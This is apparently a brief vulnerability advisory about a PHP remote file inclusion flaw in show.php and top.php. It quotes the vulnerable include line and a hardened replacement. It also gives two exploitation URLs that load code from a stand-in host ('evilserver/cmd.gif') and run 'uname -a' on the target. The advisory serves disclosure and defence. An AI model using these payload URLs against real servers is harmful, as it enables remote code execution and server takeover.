Discussion:
The problem exists in the files "show.php" and "top.php", where the
variable $path is used in an include.
Vulnerable Code:
include($path."cfg.php");
Exploitation example:
http://[target].com/[path]/show.php?path=http://evilserver/cmd.gif?&cmd=uname -a
http://[target].com/[path]/top.php?path=http://evilserver/cmd.gif?&cmd=uname -a
Contact the Vendor
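A hardened form of the include shown under Vulnerable Code, as an added example that is not part of the original advisory or the vendor's code. APP_ROOT and resolve_cfg() are hypothetical names, and the example assumes $path reaches include() from the "path" request parameter.

```php
<?php
// Added example, not the application's code. APP_ROOT and resolve_cfg() are
// hypothetical names. Assumes $path reached include() from the "path" request
// parameter (e.g. via register_globals), as the advisory's URLs suggest.
//
// php.ini settings that close the remote-include route regardless of code:
//   allow_url_include = Off
//   register_globals  = Off   (directive removed in PHP 5.4)

define('APP_ROOT', realpath(__DIR__));

// Return the absolute path of cfg.php in a directory under APP_ROOT,
// or null when the caller-supplied directory is not acceptable.
function resolve_cfg($candidate)
{
    // Reject non-strings, NUL bytes and anything with a scheme prefix
    // (http://, ftp://, php://, data: ...).
    if (!is_string($candidate)
        || strpos($candidate, "\0") !== false
        || preg_match('#^[a-z][a-z0-9+.\-]*:#i', $candidate)) {
        return null;
    }
    // realpath() resolves ../ and symlinks, and returns false for paths
    // that do not exist on the local filesystem.
    $dir = realpath(APP_ROOT . DIRECTORY_SEPARATOR . $candidate);
    if ($dir === false || !is_dir($dir)) {
        return null;
    }
    // Confine the resolved directory to APP_ROOT.
    if ($dir !== APP_ROOT && strpos($dir, APP_ROOT . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    $file = $dir . DIRECTORY_SEPARATOR . 'cfg.php';
    return is_file($file) ? $file : null;
}

// Preferred fix: the include path is a constant, never request data.
$cfg = APP_ROOT . DIRECTORY_SEPARATOR . 'cfg.php';

// Only if a sub-directory really must be selectable by the caller:
if (isset($_GET['path'])) {
    $cfg = resolve_cfg($_GET['path']);
    if ($cfg === null) {
        header('HTTP/1.1 400 Bad Request');
        exit('Invalid path');
    }
}
include $cfg;
```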
===========================================================
Aria Security Research
Http://www.aria-security.net